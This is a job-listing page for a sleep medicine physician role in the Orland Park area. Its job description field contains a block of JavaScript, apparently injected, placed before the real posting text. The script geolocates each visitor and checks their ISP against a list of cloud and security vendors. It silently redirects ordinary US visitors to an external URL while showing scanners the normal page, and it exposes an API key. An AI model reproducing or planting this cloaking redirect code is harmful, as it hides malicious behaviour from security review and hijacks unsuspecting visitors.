Sleep Medicine Physician

Springfield, IL
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/d37d7e19676b4872/f71a88a863efc73ccf2300362c12d866917fb4644f8458ea09b30e77a2a7d5b1/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

We are seeking a BC/BE Sleep Medicine Physician to join a progressive, AASM-accredited sleep center in Orland Park, with travel to Naperville as needed. The team includes physicians, behavioral sleep specialists, APPs, dental sleep experts, and technologists, with in-house DME.

  • Enjoy a 4-day work week, competitive salary ($200k-$250k), and comprehensive benefits including health, dental, vision, 401(k), PTO, and more.
  • Opportunity for ownership through an ESOP after one year, potentially increasing earnings and retirement wealth.
  • Provide patient care, diagnose and treat sleep disorders, and collaborate with a multidisciplinary team. Flexibility to travel to Naperville is available. Work hours are Monday-Thursday, 8 am-6 pm.

    Applicants must have an MD license and BC/BE in Sleep Medicine or BE with potential to become BC. The role offers a dynamic work environment focused on growth, ownership, and high-quality patient care.